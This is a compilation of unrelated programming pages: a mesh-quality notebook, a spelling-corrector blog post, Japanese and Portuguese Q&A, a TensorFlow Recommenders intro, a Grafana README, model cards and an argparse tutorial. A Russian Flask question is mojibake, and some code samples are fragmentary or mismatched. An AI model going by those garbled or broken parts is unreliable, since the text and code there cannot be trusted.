)
m = sk.get_unstructured_mesh()
m.find_side_sets(mode="cartesian")
m
<salvus.mesh.unstructured_mesh.UnstructuredMesh at 0x7f39e4d8bed0>
A popular quality measure in the community is the equiangular skewness, which is defined as
\begin{align}\text{skew} = \max \left(\frac{\theta{\max} - \theta{e}}{180 - \theta{e}},\frac{\theta{e} - \theta{\min}}{\theta{e}}\right).\end{align}
Quality meshes must not have skewed elements (skewness <~ 0.75), a single bad element can cause instability in the time extrapolation.
m.plot_quality("equiangular_skewness")
Locate skewed elements visually:
m.attach_field(
"equiangular_skewness", m.compute_mesh_quality("equiangular_skewness")
)
m
<salvus.mesh.unstructured_mesh.UnstructuredMesh at 0x7f39e4d8bed0>
Another important quality criterion is the resolution of the waves at the specified frequency, that is the elements need to be smaller than a constant times the local wavelength:
\begin{align}h{\max} < \frac{\lambda}{n} = \frac{v{s}}{f n},\end{align}
where is the frequency, is the longest edge of the element an is the number of elements used per wavelength (typically 2). This criterion is not strict in the sense that it is no problem if it is violated by a few elements.
As this was an input to the mesh generation routine, we should expect that this criterion is fulfilled here.
hmax = model.get_edgelengths_radius(
m.get_element_centroid()[:, -1], dominant_period=1.0 / frequency
)
h = m._hmax() / hmax
print("h_min = {0}, h_max = {1}".format(h.min(), h.max()))
m.attach_field("h", h)
m
h_min = 0.45454545454545486, h_max = 1.0000000000000009
<salvus.mesh.unstructured_mesh.UnstructuredMesh at 0x7f39e4d8bed0>
We can estimate the simulation cost to be proportional to number of elements / time step to compare different meshes. The largest stable time step in explicit time stepping schemes can be estimated based on the Courant criterion:
\begin{align}C = \frac{v{p} \Delta t}{h{\min}} < C_{\max},\end{align}
where is the minimum point distance in each element, the time step and the Courant number. depends on the time scheme and a typical value is .
While the is often just computed based on the edgelengths of each element, salvus has a more accurate estimator that takes the deformation of the elements into account. With this more accurate cost estimate, one may find even more skewed elements acceptable, as long as they do not result in an unfeasible time step.
Note that the estimated here needs to be scaled by the courant number and GLL point distance for the order of the spectral elements to get the final time step.
z = m.get_element_centroid()[:, -1]
vp = model.get_elastic_parameter("VP", z, scaled=False)
# edgelength based estimate
dt1, dt1_elem = m.compute_dt(vp, fast=True)
# more accurate estimate
dt2, dt2_elem = m.compute_dt(vp, fast=False)
print("number of elements: %i" % m.nelem)
print("edgelength based dt: %.2f" % dt1)
print("accurate dt: %.2f" % dt2)
print("cost factor: %.1f" % (m.nelem / dt2))
number of elements: 300 edgelength based dt: 1.32 accurate dt: 0.61 cost factor: 493.1
plot dt over the mesh to locate the minimum:
m.attach_field("dt1", dt1_elem)
m.attach_field("dt2", dt2_elem)
m
|
If you’ve spent any time looking at online NLP resources, you’ve probably run into spelling correctors. Writing a simple but reasonably accurate and powerful spelling corrector can be done with very few lines of code. I found this sample program by Peter Norvig (first written in 2006) that does it in about 30 lines. As an exercise, I decided to port it over to Estonian. If you want to do something similar, here’s what you’ll need to do.
First: You need some text!
Norvig’s program begins by processing a text file—specifically, it extracts tokens based on a very simple regular expression.
import re
from collections import Counter
def words(text): return re.findall(r'\w+', text.lower())
WORDS = Counter(words(open('big.txt').read()))
The program builds its dictionary of known “words” by parsing a text file—big.txt—and counting all the “words” it finds in the text file, where “word” for the program means any continuous string of one or more letters, digits, and the underscore _ (r'\w+'). The idea is that the program can provide spelling corrections if it is exposed to a large number of correct spellings of a variety of words. Norvig’s ran his original program on just over 1 million words, which resulted in a dictionary of about 30,000 unique words.
To build your own text file, the easiest route is to use existing corpora, if available. For Estonian, there are many freely available corpora. In fact, Sven Laur and colleagues built clear workflows for downloading and processing these corpora in Python (estnltk). I decided to use the Estonian Reference Corpus. I excluded the chatrooms part of the corpus (because it was full of spelling errors), but I still ended up with just north of 3.5 million unique words in a corpus of over 200 million total words.
Measuring string similarity through edit distance
Norvig takes care to explain how the program works both mechanically (i.e., the code) and theoretically (i.e., probability theory). I want to highlight one piece of that: edit distance. Edit distance is a means to measure similarity between two strings based on how many changes (e.g., deletions, additions, transpositions, …) must be made to string1 in order to yield string2.
The spelling corrector utilizes edit distance to find suitable corrections in the following way. Given a test string, …
If the string matches a word the program knows, then the string is a correctly spelled word.
If there are no exact matches, generate all strings that are one change awayfrom the test string.
If any of them are words the program knows, choose the one with the greatest frequency in the overall corpus.
If there are no exact matchesormatches at an edit distance of 1, check all strings that aretwo changes awayfrom the test string.
If any of them are words the program knows, choose the one with the greatest frequency in the overall corpus.
If there are still no matches, return the test string—there is nothing similar in the corpus, so the program can’t figure it out.
The point in the program that generates all the strings that are one change away is given below. This is the next place where you’ll need to edit the code to adapt it for another language!
def edits1(word):
# "All edits that are one edit away from `word`."
letters = 'abcdefghijklmnopqrstuvwxyz'
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [L + R[1:] for L, R in splits if R]
transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R)>1]
replaces = [L + c + R[1:] for L, R in splits if R for c in letters]
inserts = [L + c + R for L, R in splits for c in letters]
return set(deletes + transposes + replaces + inserts)
Without getting into the technical details of the implementation, the code takes an input string and returns a set containing all strings that differ from the input in only one way: with a deletion, transposition, replacement, or insertion. So, if our input was ‘paer’, edits1 would return a set including (among other thing) par, paper, pare, and pier.
The code I’ve represented above will need to be edited to be used with many non-English languages. Can you see why? The program relies on a list of letters in order to create replaces and inserts. Of course, Estonian does not have the same alphabet as English! So for Estonian, you have to change the line that sets the value for letters to match the Estonian alphabet (adding ä, ö, õ, ü, š, ž; subtracting c, q, w, x, y):
letters = 'aäbdefghijklmnoöõprsštuüvzž'
Once you make that change, it should be up and running! Before wrapping up this post, I want to discuss one key difference between English and Estonian that can lead to some different results.
A difference between English and Estonian: morphology!
In Norvig’s original implementation for English, a corpus of 1,115,504 words yielded 32,192 unique words. I chopped my corpus down to the same length, and I found a much larger number of unique words: 170,420! What’s going on here? Does Estonian just have a much richer vocabulary than English? I’d say that’s unlikely; rather, this has to do with what the program treats as a word. As far as the program is concerned, be, am, is, are, were, was, being, been are all different words, because they’re different sequences of characters. When the program counts unique words, it will count each form of be as a unique word. There is a long-standing joke in linguistics that we can’t define what a word is, but many speakers have the intuition is and am are not “different words”: they’re different forms of the same word.
The problem is compounded in Estonian, which has very rich morphology. The verb be in English has 8 different forms, which is high for English. Most verbs in English have just 4 or 5. In Estonian, most verbs have over 30 forms. In fact, it’s similar for nouns, which all have 12-14 “unique” forms (times two if they can be pluralized). Because this simple spelling corrector defines word as roughly “a unique string of letters with spaces on either side”, it will treat all forms of olema ‘be’ as different words.
Why might this matter? Well, this program uses probability to recommend the most likely correction for any misspelled words: choose the word (i) with the fewest changes that (ii) is most common in the corpus. Because of how the program defines “word”, the resulting probabilities are not about words on a higher level, they’re about strings, e.g., How frequent is the string ‘is’ in the corpus? As a result, it’s possible that a misspelling of a common word could get beaten by a less common word (if, for example, it’s a particularly rare form of the common word). This problem could be avoided by calculating probabilities on a version of the corpus that has been stemmed, but in truth, the real answer is probably to just build a more sophisticated spelling corrector!
Spelling correction: mostly an English problem anyway
Ultimately, designing spelling correction systems based on English might lead them to have an English bias, i.e., to not necessarily work as effectively on other languages. But that’s probably fine, because spelling is primarily an English problem anyway. When something is this easy to put together, you may want to do it just for fun, and you’ll get to practice some things—in this case, building a data set—along the way.
|
楕円加算について研究しています.
手計算では合っているのにプログラミングにすると違う答えが返ってきてしまいます
ec_double
ec_add
ec_third
Base_10_to_n(X,n)
の関数は問題ないことがわかっているため説明は省略させていただきます.
数字を3進法に直し値が0,1,2ごとにそれぞれ以下のように関数に当てはめるようにしたいと思っています
0の場合はec_third(Q)のみ
1の場合はec_third(Q)からec_add(Q,P),ec_third(Q)
2の場合はec_third(Q)からG2=ec_double(P),ec_add(Q,P)
おそらくbite=2のときが間違えているようです
G2の値は(10,0)が正解です
ご回答宜しくお願い致します
def Base_10_to_n(X,n):3進法に直す
if(int(X/n)):
return Base_10_to_n(int(X/n),n)+str(X%n)
return str(X%n)
def third_mathod(P,d):
Q=P
for bit in Base_10_to_n(d,3)[1:]:#1番目の要素から最後の要素まで取得
Q=ec_third(Q)
if bit =="1":
Q=ec_add(Q,P)
elif bit =="2":
P=ec_double(P)
Q=ec_add(Q,P)
return Q
気になる質問をクリップする
クリップした質問は、後からいつでもマイページで確認できます。
またクリップした質問に回答があった際、通知やメールを受け取ることができます。
クリップを取り消します
良い質問の評価を上げる
以下のような質問は評価を上げましょう
質問内容が明確
自分も答えを知りたい
質問者以外のユーザにも役立つ
評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。
質問の評価を上げたことを取り消します
評価を下げられる数の上限に達しました
評価を下げることができません
1日5回まで評価を下げられます
1日に1ユーザに対して2回まで評価を下げられます
質問の評価を下げる
teratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。
プログラミングに関係のない質問
やってほしいことだけを記載した丸投げの質問
問題・課題が含まれていない質問
意図的に内容が抹消された質問
過去に投稿した質問と同じ内容の質問
広告と受け取られるような投稿
評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。
質問の評価を下げたことを取り消します
この機能は開放されていません
評価を下げる条件を満たしてません
質問への追記・修正、ベストアンサー選択の依頼
15分調べてもわからないことは、teratailで質問しよう!
ただいまの回答率 88.34%
質問をまとめることで、思考を整理して素早く解決
テンプレート機能で、簡単に質問をまとめられる
|
定期的なタスクを実行するために最低限の例が必要です(5分ごとに何らかの機能を実行するか、12:00:00に何かを実行するなど)。
私のmyapp/tasks.pyで、 私が持っています、
from celery.task.schedules import crontab
from celery.decorators import periodic_task
from celery import task
@periodic_task(run_every=(crontab(hour="*", minute=1)), name="run_every_1_minutes", ignore_result=True)
def return_5():
return 5
@task
def test():
return "test"
セロリの労働者を実行すると、タスクが表示されます(以下を参照)が、値を返さない (ターミナルまたは花のいずれか)。
[tasks] . mathematica.core.tasks.test . run_every_1_minutes
必要な結果を得るために、最小限の例またはヒントを提供してください。
バックグラウンド:
私はconfig/celery.pyを持っています次のものが含まれます。
import os
from celery import Celery
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
app = Celery('config')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
そして私のconfig/__init__.pyで、 私が持っています
from .celery import app as celery_app
__all__ = ['celery_app']
以下のような関数をmyapp/tasks.pyに追加しました
from celery import task
@task
def test():
return "test"
test.delay()を実行するときシェルから、正常に実行され、タスク情報も花で表示されます
回答 1 件
定期的なタスクを実行するには、セロリビートも実行する必要があります。次のコマンドで実行できます:
celery -A proj beat
または、1人のワーカーを使用している場合:
celery -A proj worker -B
|
Passar como parametro
Você pode colocar a variável "mts_quadrados" como parâmetro na função "prog_main" e depois passar a função "prog" como parâmetro para "prog_main" e colocar o retorno de "prog" a variável "mts_quadrados", como no exemplo abaixo:
def prog():
print("Informe o valor: ")
cli()
mts_quadrados = int(input(":"))
clr()
return mts_quadrados # retorna o valor
def prog_main(mts_quadrados):
qtd_lata = int(mts_quadrados / 6)
vlr_lata = float(qtd_lata * 80)
prog_main(prog()) # o retorno de "prog" e passado como parâmetro para "prog_main"
Usar a palavra reservada global
Usando a palavra reservada global no começo da função o Python entende que aquela variável é de escopo global.
mts_quadrados = 0
def prog():
global mts_quadrados
print("Informe o valor: ")
cli()
mts_quadrados = int(input(":"))
clr()
def prog_main():
global mts_quadrados
qtd_lata = int(mts_quadrados / 6)
vlr_lata = float(qtd_lata * 80)
Como usar uma variável global numa função diferente da que a criou?
|
У Ð¼ÐµÐ½Ñ ÐµÑÑÑ ÐºÐ¾Ð´:
@manager.command
def list_routes():
import urllib
import csv
for rule in app.url_map.iter_rules():
options = {}
for arg in rule.arguments:
options[arg] = "[{0}]".format(arg)
url = rule.rule
line = urllib.parse.unquote("{}{} ".format(rule.endpoint, url))
with open('urls.cvs', 'a') as out:
spamwriter = csv.writer(out, lineterminator='', dialect='excel')
spamwriter.writerows(line)
spamwriter.writerows('\n')
Ðне нÑжно заполниÑÑ cvs Ñайл Ñак, ÑÑо Ð±Ñ rule.endpoint и url бÑли оÑделÑнÑми колонками.
|
September 23, 2020 — Posted by Maciej Kula and James Chen, Google BrainFrom recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.At Google, we have spent the last several years exploring new deep learning techniques to …
From recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.
At Google, we have spent the last several years exploring new deep learning techniques to provide better recommendations through multi-task learning, reinforcement learning, better user representations and fairness objectives. These and other advancements have allowed us to greatly improve our recommendations.
Today, we're excited to introduce TensorFlow Recommenders (TFRS), an open-source TensorFlow package that makes building, evaluating, and serving sophisticated recommender models easy.
Built with TensorFlow 2.x, TFRS makes it possible to:
TFRS is based on TensorFlow 2.x and Keras, making it instantly familiar and user-friendly. It is modular by design (so that you can easily customize individual layers and metrics), but still forms a cohesive whole (so that the individual components work well together). Throughout the design of TFRS, we've emphasized flexibility and ease-of-use: default settings should be sensible; common tasks should be intuitive and straightforward to implement; more complex or custom recommendation tasks should be possible.
TensorFlow Recommenders is open-source and available on Github. Our goal is to make it an evolving platform, flexible enough for conducting academic research and highly scalable for building web-scale recommender systems. We also plan to expand its capabilities for multi-task learning, feature cross modeling, self-supervised learning, and state-of-the-art efficient approximate nearest neighbours computation.
To get a feel for how to use TensorFlow Recommenders, let’s start with a simple example. First, install TFRS using pip:
!pip install tensorflow_recommenders
We can then use the MovieLens dataset to train a simple model for movie recommendations. This dataset contains information on what movies a user watched, and what ratings users gave to the movies they watched.
We will use this dataset to build a model to predict which movies a user watched, and which they didn't. A common and effective pattern for this sort of task is the so-called two-tower model: a neural network with two sub-models that learn representations for queries and candidates separately. The score of a given query-candidate pair is simply the dot product of the outputs of these two towers.
This model architecture is quite flexible. The inputs can be anything: user ids, search queries, or timestamps on the query side; movie titles, descriptions, synopses, lists of starring actors on the candidate side.
In this example, we're going to keep things simple and stick to user ids for the query tower, and movie titles for the candidate tower.
To start with, let's prepare our data. The data is available in TensorFlow Datasets.
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_recommenders as tfrs
# Ratings data.
ratings = tfds.load("movie_lens/100k-ratings", split="train")
# Features of all the available movies.
movies = tfds.load("movie_lens/100k-movies", split="train")
Out of all the features available in the dataset, the most useful are user ids and movie titles. While TFRS can use arbitrarily rich features, let's only use those to keep things simple.
ratings = ratings.map(lambda x: {
"movie_title": x["movie_title"],
"user_id": x["user_id"],
})
movies = movies.map(lambda x: x["movie_title"])
When using only user ids and movie titles our simple two-tower model is very similar to a typical matrix factorization model. To build it, we're going to need the following:
TFRS and Keras provide a lot of the building blocks to make this happen. We can start with creating a model class. In the __init__ method, we set up some hyper-parameters as well as the primary components of the model.
class TwoTowerMovielensModel(tfrs.Model):
"""MovieLens prediction model."""
def __init__(self):
# The `__init__` method sets up the model architecture.
super().__init__()
# How large the representation vectors are for inputs: larger vectors make
# for a more expressive model but may cause over-fitting.
embedding_dim = 32
num_unique_users = 1000
num_unique_movies = 1700
eval_batch_size = 128
The first major component is the user model: a set of layers that describe how raw user features should be transformed into numerical user representations. Here, we use the Keras preprocessing layers to turn user ids into integer indices, then map those into learned embedding vectors:
# Set up user and movie representations.
self.user_model = tf.keras.Sequential([
# We first turn the raw user ids into contiguous integers by looking them
# up in a vocabulary.
tf.keras.layers.experimental.preprocessing.StringLookup(
max_tokens=num_unique_users),
# We then map the result into embedding vectors.
tf.keras.layers.Embedding(num_unique_users, embedding_dim)
])
The movie model looks similar, translating movie titles into embeddings:
self.movie_model = tf.keras.Sequential([
tf.keras.layers.experimental.preprocessing.StringLookup(
max_tokens=num_unique_movies),
tf.keras.layers.Embedding(num_unique_movies, embedding_dim)
])
Once we have both user and movie models we need to define our objective and its evaluation metrics. In TFRS, we can do this via the Retrieval task (using the in-batch softmax loss):
# The `Task` objects has two purposes: (1) it computes the loss and (2)
# keeps track of metrics.
self.task = tfrs.tasks.Retrieval(
# In this case, our metrics are top-k metrics: given a user and a known
# watched movie, how highly would the model rank the true movie out of
# all possible movies?
metrics=tfrs.metrics.FactorizedTopK(
candidates=movies.batch(eval_batch_size).map(self.movie_model)
)
)
We use the compute_loss method to describe how the model should be trained.
def compute_loss(self, features, training=False):
# The `compute_loss` method determines how loss is computed.
# Compute user and item embeddings.
user_embeddings = self.user_model(features["user_id"])
movie_embeddings = self.movie_model(features["movie_title"])
# Pass them into the task to get the resulting loss. The lower the loss is, the
# better the model is at telling apart true watches from watches that did
# not happen in the training data.
return self.task(user_embeddings, movie_embeddings)
We can fit this model using standard Keras fit calls:
model = MovielensModel()
model.compile(optimizer=tf.keras.optimizers.Adagrad(0.1))
model.fit(ratings.batch(4096), verbose=False)
To sanity-check the model’s recommendations we can use the TFRS BruteForce layer. The BruteForce layer is indexed with precomputed representations of candidates, and allows us to retrieve top movies in response to a query by computing the query-candidate score for all possible candidates:
index = tfrs.layers.ann.BruteForce(model.user_model)
index.index(movies.batch(100).map(model.movie_model), movies)
# Get recommendations.
_, titles = index(tf.constant(["42"]))
print(f"Recommendations for user 42: {titles[0, :3]}")
Of course, the BruteForce layer is only suitable for very small datasets. See our full tutorial for an example of using TFRS with Annoy, an approximate nearest neighbours library.
We hope this gave you a taste of what TensorFlow Recommenders offers. To learn more, check out our tutorials or the API reference. If you'd like to get involved in shaping the future of TensorFlow recommender systems, consider contributing! We will also shortly be announcing a TensorFlow Recommendations Special Interest Group, welcoming collaboration and contributions on topics such as embedding learning and distributed training and serving. Stay tuned!
September 23, 2020 — Posted by Maciej Kula and James Chen, Google BrainFrom recommending movies or restaurants to coordinating fashion accessories and highlighting blog posts and news articles, recommender systems are an important application of machine learning, surfacing new discoveries and helping users find what they love.At Google, we have spent the last several years exploring new deep learning techniques to …
|
Grafana Parity Report
A parity report panel for Grafana.
Overview
This panel shows a parity report for multiple series. A report is represented as a table with rows. Each row shows a custom check expressed as an equation having the series data reduced to a representative value by means of mathjs functions along with two extra functions supported by this plugin, namely:
# gives the first datapoint in the series
first()
# gives the last datapoint in the series
last()
Each of these functions takes an alias name genereated by the 'alias()' graphite function for queries under the metrics tab. An example of queries having aliases as A, B and C is shown below:
alias(test.network.toplevel.traffic.incoming.rate, 'A')
alias(test.network.toplevel.traffic.outgoing.route1.rate, 'B')
alias(test.network.toplevel.traffic.outgoing.route2.rate, 'C')
By default the plugin looks for "target" as the key in the JSON response but it can be changed through the Alias Key field under the options tab. The JSON response from the datasource should be of the following format (with "target" or some other key specified through Alias Key field)
[
{
"target":"A",
"datapoints":[
[100,1450754160000],
[102,1450754210000],
...
]
},
{
"target":"B",
"datapoints":[
[50,1450754160000],
[52,1450754210000],
...
]
},
...
]
These queries can then be used in the custom checks expressed as equations and referred by their aliases A, B and C.
max(A) + min(B) = mean(C) * 2
sum(B) / first(A) * 5 = last(C)
first(A) + var(B) = first(B) + std(C)
derivative("x^2", "x").eval({x: mean(A)}) = hypot(C)
On defining equations like above one can set multiple thresholds on accepted percentage difference between LHS and RHS of the equation, the breach of which can be shown in the parity report table as different colors set against the thresholds. The report also shows the percentage difference with configurable precision.
THE NAME OF THE ALIASES SHOULD BE VALID JAVASCRIPT VARIABLES NAMES
Compatibility
This panel should work will work with Graphite.
Development
Docker is an easy way to spin-up an instance of Grafana. With docker installed, run the following command in the directory containing the plugin; this will expose the local plugin on your machine to the Grafana container so you can test it out.
docker run -it -v $PWD:/var/lib/grafana/plugins/parity_report -p 3000:3000 --name grafana.docker grafana/grafana
Now do this...
# Install development packages
npm install
# Install the grunt-cli
sudo npm install -g grunt-cli
# Compile into dist/
grunt
# Restart Grafana to see it
docker restart grafana.docker
# Watch for changes (requires refresh)
grunt watch
Use grunt test to run the Jasmine tests for the plugin; and grunt eslint to check for style issues. Note that the plugin controller isn't tested because it depends on Grafana native libraries, which aren't available outside of Grafana.
Contributing
For bugs and new features, open an issue and we'll take a look. If you want to contribute to the plugin, you're welcome to submit a pull request - just make sure grunt runs without errors first.
|
Say you have a list that contains duplicate numbers:
numbers = [1, 1, 2, 3, 3, 4]
But you want a list of unique numbers.
unique_numbers = [1, 2, 3, 4]
There are a few ways to get a list of unique values in Python. This article will show you how.
Option 1 – Using a Set to Get Unique Elements
Using a set one way to go about it. A set is useful because it contains unique elements.
You can use a set to get the unique elements. Then, turn the set into a list.
Let’s look at two approaches that use a set and a list. The first approach is verbose, but it’s useful to see what’s happening each step of the way.
numbers = [1, 2, 2, 3, 3, 4, 5]
def get_unique_numbers(numbers):
list_of_unique_numbers = []
unique_numbers = set(numbers)
for number in unique_numbers:
list_of_unique_numbers.append(number)
return list_of_unique_numbers
print(get_unique_numbers(numbers))
# result: [1, 2, 3, 4, 5]
Let’s take a closer look at what’s happening. I’m given a list of numbers, numbers. I pass this list into the function,
.get_unique_numbers
Inside the function, I create an empty list, which will eventually hold all of the unique numbers. Then, I use a set to get the unique numbers from the
list.numbers
unique_numbers = set(numbers)
I have what I need: the unique numbers. Now I need to get these values into a list. To do so, I use a for loop to iterate through each number in the set.
for number in unique_numbers:
list_of_unique_numbers.append(number)
On each iteration I add the current number to the list, list_of_unique_numbers. Finally, I return this list at the end of the program.
There’s a shorter way to use a set and list to get unique values in Python. That’s what we’ll tackle next.
A Shorter Approach with Set
All of the code written in the above example can be condensed into one line with the help of Python’s built-in functions.
numbers = [1, 2, 2, 3, 3, 4, 5]
unique_numbers = list(set(numbers))
print(unique_numbers)
# Result: [1, 2, 3, 4, 5]
Although this code looks very different from the first example, the idea is the same. Use a set to get the unique numbers. Then, turn the set into a list.
unique_numbers = list(set(numbers))
It’s helpful to think “inside out” when reading the above code. The innermost code gets evaluated first: set(numbers). Then, the outermost code is evaluated:
.list(set(numbers))
Option 2 – Using Iteration to Identify Unique Values
Iteration is another approach to consider.
The main idea is to create an empty list that’ll hold unique numbers. Then, use a for loop iterate over each number in the given list. If the number is already in the unique list, then continue on to the next iteration. Otherwise, add the number to it.
Let's look at two ways to use iteration to get the unique values in a list, starting with the more verbose one.
numbers = [20, 20, 30, 30, 40]
def get_unique_numbers(numbers):
unique = []
for number in numbers:
if number in unique:
continue
else:
unique.append(number)
return unique
print(get_unique_numbers(numbers))
# Result: [20, 30, 40]
Here’s what’s happening each step of the way. First, I’m given a list of numbers, numbers. I pass this list into my function,
.get_unique_numbers
Inside the function, I create an empty list, unique. Eventually, this list will hold all of the unique numbers.
I use a for loop to iterate through each number in the numbers list.
for number in numbers:
if number in unique:
continue
else:
unique.append(number)
The conditional inside the loop checks to see if the number of the current iteration is in the unique list. If so, the loop continues to the next iteration. Otherwise, the number gets added to this list.
Here’s the important point: only the unique numbers are added. Once the loop is complete, then I return unique which contains all of the unique numbers.
A Shorter Approach with Iteration
There’s another way to write the function in fewer lines.
numbers = [20, 20, 30, 30, 40]
def get_unique_numbers(numbers):
unique = []
for number in numbers:
if number not in unique:
unique.append(number)
return unique
#Result: [20, 30, 40]
The difference is the conditional. This time it’s set up to read like this: if the number is not in unique, then add it.
if number not in unique:
unique.append(number)
Otherwise, the loop will move along to the next number in the list, numbers.
The result is the same. However, it’s sometimes harder to think about and read code when the boolean is negated.
There are other ways to find unique values in a Python list. But you’ll probably find yourself reaching for one of the approaches covered in this article.
|
bert-base-en-zh-hi-cased
We are sharing smaller versions of bert-base-multilingual-cased that handle a custom number of languages.
Unlike distilbert-base-multilingual-cased, our versions give exactly the same representations produced by the original model which preserves the original accuracy.
For more information please visit our paper: Load What You Need: Smaller Versions of Multilingual BERT.
How to use
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("Geotrend/bert-base-en-zh-hi-cased")
model = AutoModel.from_pretrained("Geotrend/bert-base-en-zh-hi-cased")
To generate other smaller versions of multilingual transformers please visit our Github repo.
How to cite
@inproceedings{smallermbert,
title={Load What You Need: Smaller Versions of Mutlilingual BERT},
author={Abdaoui, Amine and Pradel, Camille and Sigel, Grégoire},
booktitle={SustaiNLP / EMNLP},
year={2020}
}
Contact
Please contact [email protected] for any question, feedback or request.
Downloads last month
0
|
I was made with huggingtweets.
Create your own bot based on your favorite user with the demo!
How does it work?
The model uses the following pipeline.
To understand how the model was developed, check the W&B report.
Training data
The model was trained on @taylorswift13's tweets.
Data Quantity
Tweets downloaded 523
Retweets 79
Short tweets 77
Tweets kept 367
Training procedure
The model is based on a pre-trained GPT-2 which is fine-tuned on @taylorswift13's tweets.
Hyperparameters and metrics are recorded in the W&B training run for full transparency and reproducibility.
At the end of training, the final model is logged and versioned.
Intended uses & limitations
How to use
You can use this model directly with a pipeline for text generation:
from transformers import pipeline
generator = pipeline('text-generation',
model='huggingtweets/taylorswift13')
generator("My dream is", num_return_sequences=5)
Limitations and bias
The model suffers from the same limitations and bias as GPT-2.
In addition, the data present in the user's tweets further affects the text generated by the model.
About
Built by Boris Dayma
Downloads last month
0
|
I use Python as my go-to tool for command-line scripts, these often requiring parsing command-line arguments. Since I use various programming languages I don’t remember anything, so I create reference docs for myself and hopefully others.
So similar to my Python String Format Cookbook, that is examples for string and number formatting, I wrote this documentation for parsing command-line arguments in Python.
What Library to Use
I don’t know the history, but there are a couple standard libraries you can use to parse command-line arguments. The one you want to use is argparse module. Similar in name to optparse but that is the older deprecated module.
Also confusingly there is a getopt module that handles parsing of command-line arguments but is more complicated and requires writing more code.
Just use argparse module, it works great for both Python2 and Python3.
Basic Example
First, you may not need a module. If all you want to do is grab a single argument and no flags or other parameters passed in, you can just use sys.argv array that contains all of the command-line parameters.
The first element in sys.argv is the script itself. So a parameter passed in will be in the second element: sys.argv[1]
import sys
if len(sys.argv) > 1:
print( "~ Script: " + sys.argv[0] )
print( "~ Arg : " + sys.argv[1] )
else:
print(" No arguments ")
Saving as test.py and running gives:
$ python test.py Foo~ Script: test.py~ Arg : Foo
Multiple Arguments with sys.argv
Since sys.argv is simply a list, you can grab blocks of arguments together or slice around as you would any other list.
Last argument: sys.argv[-1]
All args after first: " ".join(sys.argv[2:])
Flag Parameters
You need to start using a module when you want to start including flags such as --help or want to have optional arguments, or varying length parameters. As mentioned, the best standard module to use is argparse.
Help and Verbose Examples
import argparse
parser = argparse.ArgumentParser(description='Demo')
parser.add_argument('--verbose',
action='store_true',
help='verbose flag' )
args = parser.parse_args()
if args.verbose:
print("~ Verbose!")
else:
print("~ Not so verbose")
Here’s how to run the above example:
$ python test.py~ Not so verbose$ python test.py --verbose~ Verbose!
The action parameter tells argparse to store true if the flag is found, otherwise it stores false. Also a great thing about using argparse is you get built-in help. You can try it out by passing in an unknown parameter, -h or --help
$ python test.py --helpusage: test.py [-h] [--verbose]Demooptional arguments: -h, --help show this help message and exit --verbose verbose output
A side effect of using argparse, you will get an error if a user passes in a command-line argument not expected, this includes flags or just an extra argument.
$ python test.py filenameusage: test.py [-h] [--verbose]test.py: error: unrecognized arguments: filename
Multiple, Short or Long Flags
You can specify multiple flags for one argument, typically this is down with short and long flags, such as --verbose and -v
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v',
action='store_true',
help='verbose flag' )
args = parser.parse_args()
if args.verbose:
print("~ Verbose!")
else:
print("~ Not so verbose")
Required Flags
You can make a flag required by setting, required=True this will cause an error if the flag is not specified.
parser = argparse.ArgumentParser()
parser.add_argument('--limit', required=True, type=int)
args = parser.parse_args()
Positional Arguments
The examples so far have been about flags, parameters starting with --, argparse also handles the positional args which are just specified without the flag. Here’s an example to illustrate.
parser = argparse.ArgumentParser()
parser.add_argument('filename')
args = parser.parse_args()
print("~ Filename: {}".format(args.filename))
Output:
$ python test.py filename.txt~ Filename: filename.txt
Number of Arguments
Argparse determines the number of arguments based on the action specified, for our verbose example, the store_true action takes no argument. By default, argparse will look for a single argument, shown above in the filename example.
If you want your parameters to accept a list of items you can specify nargs=n for how many arguments to accept. Note, if you set nargs=1, it will return as a list not a single value.
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('nums', nargs=2)
args = parser.parse_args()
print("~ Nums: {}".format(args.nums))
Output:
$ python test.py 5 2~ Nums: ['5', '2']
Variable Number of Parameters
The nargs argument accepts a couple of extra special parameters. If you want the argument to accept all of the parameters, you can use * which will return all parameters if present, or empty list if none.
parser = argparse.ArgumentParser()
parser.add_argument('nums', nargs='*')
args = parser.parse_args()
print("~ Nums: {}".format(args.nums))
Output:
$ python test.py 5 2 4~ Nums: ['5', '2', '4']
If you want to require, 1 or more parameters, use nargs='+'
Positional arguments are determined by the position specified. This can be combined with the nargs='*' for example if you want to define a filename and a list of values to store.
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('nums', nargs='*')
args = parser.parse_args()
print("~ Filename: {}".format(args.filename))
print("~ Nums: {}".format(args.nums))
Output:
$ python test.py file.txt 5 2 4~ Fileanme: file.txt~ Nums: ['5', '2', '4']
You can also specify nargs='?' if you want to make a positional argument optional, but you need to be careful how you combine ? and * parameters, especially if you put an optional positional parameter before another one.
This makes sense, not requiring the last args:
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('nums', nargs='?')
args = parser.parse_args()
Output:
$ python test.py test.txt 3
~ Filename: test.txt
~ Nums: 3
$ python test.py test.txt
~ Filename: test.txt
~ Nums: None
However, using the nargs='?' first will give unexpected results when arguments are missing, for example:
parser = argparse.ArgumentParser()
parser.add_argument('filename', nargs='?')
parser.add_argument('nums', nargs='*')
args = parser.parse_args()
Output:
$ python test.py 3 2 1~ Filename: 3~ Nums: ['2', '1']
You can use nargs with flag arguments as well.
parser = argparse.ArgumentParser()
parser.add_argument('--geo', nargs=2)
parser.add_argument('--pos', nargs=2)
parser.add_argument('type')
args = parser.parse_args()
Output:
